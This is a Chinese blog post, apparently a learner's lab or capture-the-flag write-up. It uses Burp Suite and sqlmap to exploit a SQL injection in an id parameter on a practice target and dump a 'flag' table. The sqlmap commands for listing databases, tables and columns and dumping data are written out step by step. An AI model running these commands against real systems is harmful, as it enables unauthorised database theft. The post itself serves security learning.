使用sqlmap + burpsuite sql工具注入拿flag
记录一下自己重新开始学习web安全之路③。
目标网站:http://mashang.eicp.vip:1651/7WOY59OBj74nTwKzs3aftsh1MDELK2cG/
首先判断网站是否存在SQL注入漏洞
1.找交互点
发现只有url这一个交互点,搜索框和登录框都没有。
2.找注入点
在唯一的交互点url中输入?id=2‘
发现回显不正常,说明该url是一个注入点
打开burpsuite 的抓包功能,在url中输入?id=2’,开始抓包。
使用sqlmap工具。
1.查看数据库名称(message)
python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” --current-db
–current-db //列出当前所有数据库名称
db // datebase
2.查看数据表名称(flag)
python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message --tables
-D //指定数据库名称
–tables // 列出所有的数据表
3.查看数据列名称(flag)
python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message -T flag --columns
-D //指定数据库名称
-T // 指定数据表名称
–columns // 列出所有的列
4.查看数据
python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message -T flag -C flag --dump
-D //指定数据库名称
-T // 指定数据表名称
-C // 指定数据列名称
–dump // 读取数据
MD5解密
遇到的问题
抓到的包必须是注入点的包,不然用sqlmap的时候,会报错。